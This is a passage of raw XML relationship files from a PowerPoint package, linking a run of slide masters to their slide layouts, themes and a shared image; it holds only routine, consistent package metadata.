<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2589.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2588.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2587.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2586.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2585.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2584.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2583.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2582.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme259.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2590.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2581.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster26.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout259.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout258.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout257.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout256.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout255.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout254.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout253.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout252.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme26.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout260.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout251.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster260.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2599.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2598.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2597.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2596.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2595.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2594.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2593.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2592.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme260.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2600.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2591.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster261.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2609.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2608.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2607.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2606.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2605.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2604.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2603.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2602.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme261.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2610.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2601.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster262.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2619.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2618.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2617.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2616.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2615.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2614.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2613.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2612.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme262.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2620.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2611.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster263.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2629.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2628.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2627.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2626.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2625.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2624.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2623.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2622.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme263.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2630.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2621.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster264.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2639.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2638.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2637.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2636.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2635.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2634.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2633.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2632.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme264.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2640.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2631.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster265.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2649.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2648.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2647.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2646.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2645.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2644.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2643.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2642.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme265.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2650.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2641.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster266.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2659.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2658.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2657.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2656.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2655.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2654.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2653.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2652.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme266.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2660.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2651.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster267.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2669.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2668.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2667.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2666.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2665.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2664.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2663.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2662.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme267.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2670.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2661.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster268.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2679.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2678.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2677.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2676.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2675.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2674.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2673.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2672.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme268.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2680.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2671.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster269.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2689.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2688.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2687.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2686.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2685.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2684.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2683.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2682.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme269.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2690.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2681.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster27.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout269.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout268.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout267.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout266.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout265.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout264.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout263.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout262.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme27.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout270.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout261.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster270.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2699.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2698.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2697.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2696.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2695.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2694.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2693.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2692.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme270.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2700.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2691.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster271.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2709.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2708.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2707.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2706.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2705.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2704.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2703.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2702.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme271.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2710.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2701.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster272.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2719.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2718.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2717.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2716.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2715.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2714.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2713.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2712.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme272.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2720.xml"/><Relationship Id="rId1" 